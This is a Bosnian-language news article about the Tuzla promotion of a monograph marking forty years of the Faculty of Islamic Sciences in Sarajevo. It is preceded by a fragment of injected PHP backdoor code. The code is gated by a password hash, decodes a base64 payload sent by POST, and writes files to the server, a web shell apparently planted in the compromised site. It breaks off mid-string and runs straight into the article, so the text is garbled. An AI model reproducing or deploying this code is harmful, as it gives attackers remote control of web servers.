function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Fakultet islamskih nauka u Sarajevu – prestižna visokoobrazovna ustanova u ovom dijelu svijeta - Medžlis Islamske zajednice Bijeljina

Fakultet islamskih nauka u Sarajevu – prestižna visokoobrazovna ustanova u ovom dijelu svijeta

Fakultet islamskih nauka u Sarajevu – prestižna visokoobrazovna ustanova u ovom dijelu svijeta

www.muftijstvotz.ba…Monografija Fakulteta islamskih nauka u Sarajevu, koja je objavljena u povodu četiri decenije rada i postojanja ove ustanove, promovirana je u srijedu 4. aprila u amfiteatru Behram-begove medrese u Tuzli.

O monografiji su govorili dekan Fakulteta islamskih nauka prof. dr. Zuhdija Hasanović, prodekan za nastavu prof. dr. Ahmet Alibašić i alumnisti dr. Mensur Husić i dr. Edin Peštalić, a moderator je bila doc. dr. Zehra Alispahić, koordinatorica za naučno-istraživački rad ovog fakulteta.

Prof. dr. Zuhdija Hasanović ističe da povijest islamskog obrazovanja na bosanskohercegovačkim prostorima traje stoljećima.

„Kvalitetno islamsko obrazovanje se stječe kako u odgojno-obrazovnim ustanovama – medresama, tako i na naučnoobrazovnim ustanovama, fakultetima. Postoji veliko interesovanje za studij islamskih nauka u Evropi. Zbog brojnih zloupotreba kojima svjedočimo u posljednje vrijeme, smatrali smo svojom odgovornošću, kao Fakultet islamskih nauka ali i kao Islamska zajednica u Bosni i Hercegovini, da ponudimo meritorna, autentična tumačenja islama. U Evropi se IZ-e u BiH i Fakultet islamskih nauka prepoznaju kao adresa na kojoj bi se mogli školovati islamski kadrovi, imami i vjeroučitelji za evropske države,“ kazao je dekan Hasanović.

Prof. dr. Ahmet Alibašić je govorio o nastavnim planovima i programima Fakulteta, te je ukazao na tri glavna obilježja planova i programa, a to su: islamski reformatorski kurs, integrativni pristup društvenim i humanističkim naukama, te otvorenost i komparativna perspektiva gotovo svih islamskih nauka.

Alumnisti ovog fakulteta, dr. Mensur Husić koji je diplomirao i dr. Edin Peštalić koji je na ovom fakultetu završio sva tri ciklusa, govorili su o studentima, njihovim aktivnostima i organizovanju, te o etabliranosti alumnista u različitim segmentima života i rada.

Muftija tuzlanski Vahid-ef. Fazlović je kazao da je Fakultet islamskih nauka u Sarajevu prestižna obrazovna institucija u ovom dijelu svijeta, jedinstvena po svojim ciljevima, planovima i programima.

„Doista, naš narod i ova zemlja mogu biti ponosni na Fakultet islamskih nauka u Sarajevu. On djeluje u Sarajevu, a podjednako je njegova misija važna za sve muslimane u našoj domovini i izvan domovine, u dijaspori. Tako je bilo i ranije, a u budućnosti još više očekujemo od Fakulteta islamskih nauka i s obrazovanjem i etikom na ovom fakultetu mi možemo vrlo smjelo ići u budućnost,“ kazao je muftija Fazlović, te je istakao da ova monografija ukazuje na svijetlu tradiciju obrazovanja u BiH među Bošnjacima u ovom dijelu svijeta.

Monografija je objavljena u suizdavaštvu s El-Kalemom – Izdavačkim centrom Rijaseta Islamske zajednice u BiH, a promociju su u Tuzli organizovali Muftijstvo tuzlanskog, Behram-begova medresa i Medžlisa Islamske zajednice Tuzla.